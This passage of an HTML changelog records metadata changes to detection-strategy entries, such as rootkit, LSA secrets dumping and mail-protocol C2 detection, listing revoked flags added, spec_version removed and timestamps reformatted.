collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0377] Detection of Kernel/User-Level Rootkit Behavior Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0437] Detection of LSA Secrets Dumping via Registry and Memory Extraction</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0434] Detection of Launch Agent Creation or Modification on macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0041] Detection of Lifecycle Policy Modifications for Triggered Deletion in IaaS Cloud Storage</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0893] Detection of Link Target</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0407] Detection of Local Account Abuse for Initial Access and Persistence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0013] Detection of Local Browser Artifact Access for Reconnaissance</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0380] Detection of Local Data Collection Prior to Exfiltration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0261] Detection of Local Data Staging Prior to Exfiltration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0135] Detection of Mail Protocol-Based C2 Activity (SMTP, IMAP, POP3)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0138] Detection of Malicious Code Execution via InstallUtil.exe</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0194] Detection of Malicious Control Panel Item Execution via control.exe or Rundll32</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0206] Detection of Malicious Kubernetes CronJob Scheduling</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0328] Detection of Malicious Profile Installation via CMSTP.exe</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0092] Detection of Malicious or Unauthorized Software Extensions</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 